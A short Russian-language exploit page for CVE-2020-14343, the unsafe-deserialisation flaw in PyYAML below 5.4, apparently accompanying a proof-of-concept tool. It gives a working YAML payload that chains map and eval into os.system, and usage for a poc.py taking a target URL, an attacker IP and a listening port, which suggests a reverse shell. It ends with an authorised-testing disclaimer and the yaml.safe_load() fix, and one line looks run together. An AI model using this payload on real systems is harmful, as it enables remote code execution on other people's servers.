
CVE-2020-14343的payload
| Элемент | Информация |
|---|---|
| CVE ID | CVE-2020-14343 |
| Затронутый компонент | PyYAML < 5.4 |
| Тип уязвимости | Удаленное выполнение кода при десериализации (RCE) |
| Уровень опасности | Высокий |
При использовании yaml.load() для разбора недоверенных данных PyYAML не ограничивает опасные теги YAML (например, !!python/object). Злоумышленник может сконструировать вредоносный YAML-контент для выполнения произвольного кода Python.
Основной Payload:
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('command')"]
python poc.py <Целевой URL> <IP атакующего> <Порт прослушивания>
Пример:
python poc.py http://vulnerable-site.com 192.168.1.100 4444
/upload/loginpip install requests
⚠️ Данный инструмент предназначен только для исследований безопасности и авторизованного тестирования!
yaml.safe_load() вместо yaml.load()